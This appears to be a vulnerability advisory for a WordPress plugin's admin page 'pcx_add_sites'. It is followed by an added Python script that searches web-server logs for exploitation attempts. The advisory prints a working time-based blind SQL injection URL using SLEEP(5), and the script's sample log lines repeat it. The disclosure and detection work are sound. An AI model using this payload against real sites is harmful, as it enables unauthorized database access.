EPSS Percentile: 45.2%
The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to authenticated SQL injection.
https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1 AND (SELECT 7953 FROM (SELECT(SLEEP(5)))AgUn)
codevigilant.com/disclosure/2021/wp-plugin-post-content-xmlrpc/
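A detection sketch for the request shape above, added here as an example and not taken from the advisory or the plugin: it scans web-server access logs for `page=pcx_add_sites` requests whose `id` value is not a plain integer. The combined log format, the sample lines and the function names are assumptions, and POST bodies are not visible in access logs, so this covers only the GET variant.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d+")

# Constructed sample lines (documentation IP, made-up timestamps and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - admin [10/Oct/2021:13:55:36 +0000] '
    '"GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - admin [10/Oct/2021:13:56:02 +0000] '
    '"GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20'
    '(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn) HTTP/1.1" 200 5120',
    '203.0.113.7 - admin [10/Oct/2021:13:57:11 +0000] '
    '"GET /wp-admin/admin.php?page=other_plugin&id=abc HTTP/1.1" 200 812',
]

def suspicious_id(log_line):
    """Return the decoded id value when the line is a pcx_add_sites request
    whose id parameter is not a plain integer; otherwise return None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    # parse_qs URL-decodes values, so %20 and + both become spaces.
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get("page") != ["pcx_add_sites"]:
        return None
    for value in params.get("id", []):
        if not INT_RE.fullmatch(value.strip()):
            return value
    return None

def flagged(lines):
    """Return (1-based line number, decoded id) for every suspicious line."""
    hits = ((n, suspicious_id(line)) for n, line in enumerate(lines, start=1))
    return [(n, value) for n, value in hits if value is not None]

if __name__ == "__main__":
    for number, value in flagged(SAMPLE_LOG):
        print(f"line {number}: non-integer id -> {value!r}")
```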